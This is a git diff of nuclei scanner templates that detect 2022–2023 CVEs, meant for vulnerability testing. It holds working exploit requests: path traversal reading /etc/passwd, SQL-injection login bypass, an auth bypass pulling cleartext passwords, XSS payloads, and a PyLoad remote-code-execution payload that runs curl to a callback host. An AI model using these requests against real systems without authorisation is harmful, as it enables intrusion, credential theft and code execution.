CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31268 + cwe-id: CWE-22 + epss-score: 0.00618 + epss-percentile: 0.76574 + cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gitblit + product: gitblit + shodan-query: http.html:"Gitblit" + tags: cve,cve2022,lfi,gitblit + +http: + - method: GET + path: + - "{{BaseURL}}/resources//../WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "</web-app>" + - "java.sun.com" + - "gitblit.properties" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-31793.yaml b/nuclei-templates/CVE-2022/cve-2022-31793.yaml new file mode 100644 index 0000000000..0d5e0514ca --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31793.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-31793 + +info: + name: muhttpd <=1.1.5 - Local Inclusion + author: scent2d + severity: high + description: | + muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. + remediation: Update the application to version 1.10 + reference: + - https://derekabdine.com/blog/2022-arris-advisory.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 + - https://derekabdine.com/blog/2022-arris-advisory + - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ + - http://inglorion.net/software/muhttpd/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31793 + cwe-id: CWE-22 + epss-score: 0.25241 + epss-percentile: 0.96539 + cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: inglorion + product: muhttpd + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion +tcp: + - host: + - "{{Hostname}}" + inputs: + - data: "47455420612F6574632F706173737764" + type: hex + + - data: "\n\n" + read-size: 128 + matchers: + - type: word + part: body + encoding: hex + words: + - "726f6f743a" +# digest: 4a0a004730450220552dea540450a6b50bb4fd1647d35646f4ddf95b681f33a3d832e169c3ee54a00221008959a00adc118b209a3e73b2598a4eafc401f50232ac399d121322f839f2a04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32007.yaml b/nuclei-templates/CVE-2022/cve-2022-32007.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32007.yaml rename to nuclei-templates/CVE-2022/cve-2022-32007.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-32022.yaml b/nuclei-templates/CVE-2022/cve-2022-32022.yaml index bbcd2e0040..63f2d90739 100644 --- a/nuclei-templates/CVE-2022/cve-2022-32022.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-32022.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32022 @@ -15,12 +19,18 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32022 cwe-id: CWE-89 + epss-score: 0.00897 + epss-percentile: 0.80882 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: car_rental_management_system_project + product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,login-bypass + tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project -requests: +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 @@ -28,12 +38,10 @@ requests: Content-Type: application/x-www-form-urlencoded username=admin'+or+'1'%3D'1'%23&password=admin - - | GET /admin/index.php?page=home HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -47,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 490a004630440220725a329ba41785dd96c0939334b9a1e78af7fa6421aeef4df6d2dd933c44115c0220351e53b8bd40ec2dea1271b2162432124266cbf982ff3f9fc1eaf8903b8207ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32025.yaml rename to nuclei-templates/CVE-2022/cve-2022-32025.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-32026.yaml b/nuclei-templates/CVE-2022/cve-2022-32026.yaml deleted file mode 100644 index 39e05a5192..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32026.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2022-32026 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml new file mode 100644 index 0000000000..970cc96d0e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32409.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-32409 + +info: + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion + author: pikpikcu + severity: critical + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-22 + epss-score: 0.47251 + epss-percentile: 0.97372 + cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: softwarepublico + product: i3geo + shodan-query: http.html:"i3geo" + tags: cve2022,cve,i3geo,lfi,softwarepublico + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32444.yaml b/nuclei-templates/CVE-2022/cve-2022-32444.yaml index 1460ae469c..c253fd2076 100644 --- a/nuclei-templates/CVE-2022/cve-2022-32444.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-32444.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest patch or update to a version that has fixed this vulnerability. reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 @@ -14,9 +18,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 - tags: cve,cve2022,redirect,u5cms,cms + epss-score: 0.00237 + epss-percentile: 0.61804 + cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yuba + product: u5cms + tags: cve,cve2022,redirect,u5cms,cms,yuba -requests: +http: - method: GET path: - '{{BaseURL}}/loginsave.php?u=http://interact.sh' @@ -25,6 +36,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by cs 05/30/2022 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a00463044022000c92e83439d52928c125a5e3a681d990ad3013d222cf3bc564b4449423fba5f022009cc04dbd965463fcc3710361b4673c6cdb46578f0b0221f5f237c977a44f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-33174.yaml b/nuclei-templates/CVE-2022/cve-2022-33174.yaml index 59e665b041..6bd02c9441 100644 --- a/nuclei-templates/CVE-2022/cve-2022-33174.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-33174.yaml @@ -6,20 +6,33 @@ info: severity: high description: | Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system. + remediation: | + Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability. reference: - https://gynvael.coldwind.pl/?lang=en&id=748 - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 + - https://github.com/Henry4E36/CVE-2022-33174 + - https://github.com/k0mi-tg/CVE-POC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 + epss-score: 0.01241 + epss-percentile: 0.85189 + cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: powertekpdus + product: basic_pdu_firmware shodan-query: http.html:"Powertek" - verified: "true" - tags: cve,cve2022,powertek,auth-bypass + tags: cve2022,cve,powertek,auth-bypass,powertekpdus -requests: +http: - raw: - | GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 @@ -28,7 +41,6 @@ requests: matchers-condition: and matchers: - - type: word words: - '<sys.passwd>' @@ -40,10 +52,9 @@ requests: extractors: - type: regex - part: body group: 1 regex: - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' - -# Enhanced by mp on 2022/07/15 + part: body +# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34047.yaml b/nuclei-templates/CVE-2022/cve-2022-34047.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-34047.yaml rename to nuclei-templates/CVE-2022/cve-2022-34047.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-34049.yaml b/nuclei-templates/CVE-2022/cve-2022-34049.yaml index 859471a012..c9d91f7d05 100644 --- a/nuclei-templates/CVE-2022/cve-2022-34049.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-34049.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 @@ -17,12 +21,18 @@ info: cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 + epss-score: 0.17111 + epss-percentile: 0.95601 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: cve,cve2022,wavlink,router,exposure -requests: +http: - raw: - | GET /cgi-bin/ExportLogs.sh HTTP/1.1 @@ -45,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-35416.yaml rename to nuclei-templates/CVE-2022/cve-2022-35416.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-36883.yaml b/nuclei-templates/CVE-2022/cve-2022-36883.yaml deleted file mode 100644 index 56ea8fccfa..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-36883.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-36883 - -info: - name: Git Plugin up to 4.11.3 on Jenkins Build Authorization - author: c-sh0 - severity: high - description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. - reference: - - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 - - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2022-36883 - cwe-id: CWE-862 - metadata: - shodan-query: X-Jenkins - verified: "true" - tags: cve,cve2022,jenkins,plugin,git - -requests: - - method: GET - path: - - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "repository:" - - "SCM API plugin" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-42889.yaml b/nuclei-templates/CVE-2022/cve-2022-42889.yaml index 8bac9d6211..6531b1138f 100644 --- a/nuclei-templates/CVE-2022/cve-2022-42889.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-42889.yaml @@ -2,7 +2,7 @@ id: CVE-2022-42889 info: name: Text4Shell - Remote Code Execution - author: mordavid,princechaddha + author: princechaddha severity: critical description: | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. @@ -22,7 +22,7 @@ info: confidence: tenative tags: cve,cve2022,rce,oast,text4shell,dast -http: +requests: - method: GET path: - "{{BaseURL}}" diff --git a/nuclei-templates/CVE-2023/CVE-2023-0099.yaml b/nuclei-templates/CVE-2023/CVE-2023-0099.yaml index 81521a85fe..8528e84fbe 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0099.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0099.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution. remediation: Fixed in version 115 reference: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: getlasso product: simple_urls framework: wordpress - tags: xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,cve,cve2023 + tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(body, "</script><svg/onload=alert(document.domain)>")' - 'contains(body_2, "search_term")' condition: and -# digest: 4a0a0047304502210083ee1d86f8f27dfdf5dc52807f4ee2df0f15c78f62648df8cdfbdeadc21de84b0220078b0d58f0dae4e65b50a99383484373e8ff8a30c3b91962833a19a9ffa33f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0126.yaml b/nuclei-templates/CVE-2023/CVE-2023-0126.yaml index 9f57bc7c22..abfe116aa8 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0126.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0126.yaml @@ -6,19 +6,23 @@ info: severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 - https://github.com/advisories/GHSA-mr28-27qx-phg3 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001 + - https://github.com/Gerxnox/One-Liner-Collections + - https://github.com/thecybertix/One-Liner-Collections classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.03234 - epss-percentile: 0.90184 + epss-score: 0.34658 + epss-percentile: 0.96997 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +30,7 @@ info: vendor: sonicwall product: sma1000_firmware shodan-query: title:"Appliance Management Console Login" - tags: cve,cve2023,sonicwall,lfi,sma1000 + tags: cve2023,cve,sonicwall,lfi,sma1000 http: - method: GET @@ -47,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ecbf82626efd939f4dad22403b45e0253ae9e8be55f8167abe6ea7cc6b349a3102200454083089e420239c7391312a4cff9a41331f827fc18f711fb3e724187675fe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0236.yaml b/nuclei-templates/CVE-2023/CVE-2023-0236.yaml index 54e6742055..b5fbe5c507 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0236.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0236.yaml @@ -6,17 +6,20 @@ info: severity: medium description: | WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.0.10. reference: - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8 - https://nvd.nist.gov/vuln/detail/CVE-2023-0236 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0236 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00119 + epss-percentile: 0.45193 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +27,7 @@ info: vendor: themeum product: tutor_lms framework: wordpress - tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated + tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum http: - raw: @@ -45,4 +48,4 @@ http: - 'contains(body_2, "<svg onload=prompt(document.domain)>")' - 'contains(body_2, "Instructor Registration")' condition: and -# digest: 4b0a00483046022100bf438bfc55a8db446f9d2ff1a59127b415457b68c45b2250f80d1fc556dcc5f3022100bc1243cc552dfa281aa8aea892a02858438a625d4f99d7660d5d5d2e72f181db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0261.yaml b/nuclei-templates/CVE-2023/CVE-2023-0261.yaml index 7034d2cebf..2dce0985c1 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0261.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0261.yaml @@ -6,18 +6,21 @@ info: severity: high description: | WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation. remediation: Fixed in version 10.8. reference: - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0 - https://wordpress.org/plugins/wp-tripadvisor-review-slider/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0261 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 - epss-score: 0.05306 - epss-percentile: 0.9225 + epss-score: 0.0753 + epss-percentile: 0.93501 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress - tags: cve2023,wordpress,wp,wp-tripadvisor-review-slider,auth,cve,sqli,wp-plugin,wpscan + tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps http: - raw: @@ -51,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "\"data\":{")' condition: and -# digest: 4a0a00473045022100fd1d74793ee89b8b44febd60f211c145dc9bee0a1a99b62e6ddb151fde624c930220526ead0be5be57fb7dfa9e6843c731e639e373aab489b939b49b6dbcdefeec3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cba63b19032eacb33e98f8c5b149b35ccef086fb44efb66696ab7a8c09d0435022100f4c8796c3c0aeaa9cc5d323fa7fcd5cfabcd35a46c056dd4c8a4b95b71032a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0297.yaml b/nuclei-templates/CVE-2023/CVE-2023-0297.yaml new file mode 100644 index 0000000000..9407993ab9 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-0297.yaml @@ -0,0 +1,61 @@ +id: CVE-2023-0297 + +info: + name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) + author: MrHarshvardhan,DhiyaneshDk + severity: critical + description: | + Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system. + remediation: | + Upgrade PyLoad to a version that is not affected by this vulnerability. + reference: + - https://www.exploit-db.com/exploits/51532 + - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1058 + - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html + - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0297 + cwe-id: CWE-94 + epss-score: 0.35807 + epss-percentile: 0.96764 + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: pyload + product: pyload + shodan-query: html:"pyload" + zoomeye-query: app:"pyLoad" + tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast +variables: + cmd: "curl {{interactsh-url}}" + +http: + - raw: + - | + GET /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + - | + POST /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - 'JDownloader' + + - type: word + part: interactsh_protocol + words: + - "dns" +# digest: 